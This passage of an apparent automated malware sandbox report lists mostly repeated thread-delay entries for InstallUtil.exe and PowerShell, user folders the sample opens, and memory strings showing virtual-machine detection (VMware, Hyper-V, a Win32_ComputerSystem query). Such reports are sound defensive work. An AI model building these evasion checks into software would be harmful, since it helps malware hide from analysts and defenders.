                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597605
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597499
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597160
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596374
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595936
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595827
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595496
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -597031s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596921s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596812s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596703s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596593s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596484s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596374s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596265s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596155s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -596046s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595936s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595827s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595718s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595609s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595496s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595265s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -595146s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594960s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594843s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594734s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594624s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594515s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594406s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5840Thread sleep time: -594281s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4232Thread sleep time: -8301034833169293s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2052Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep time: -16602069666338586s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100Thread sleep count: 5174 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2144Thread sleep count: 763 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599447
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599338
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599231
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598344
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597688
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597422
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596083
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594513
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594181
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594055
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593924
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593793
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593391
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593172
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593059
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599871
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599421
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599201
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598973
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598852
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598422
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597524
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596266
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594933
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594716
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594426
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594139
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598577
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598248
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597605
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597499
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597160
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596374
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595936
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595827
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595496
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: doc1.exe, 00000001.00000002.2303581232.0000000005612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2326637032.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328065250.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329661615.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2311543486.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303245791.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2
                  Source: bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2326637032.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328065250.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329661615.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327596611.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324169500.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2311543486.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303245791.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328293123.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325315975.0000000000B9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
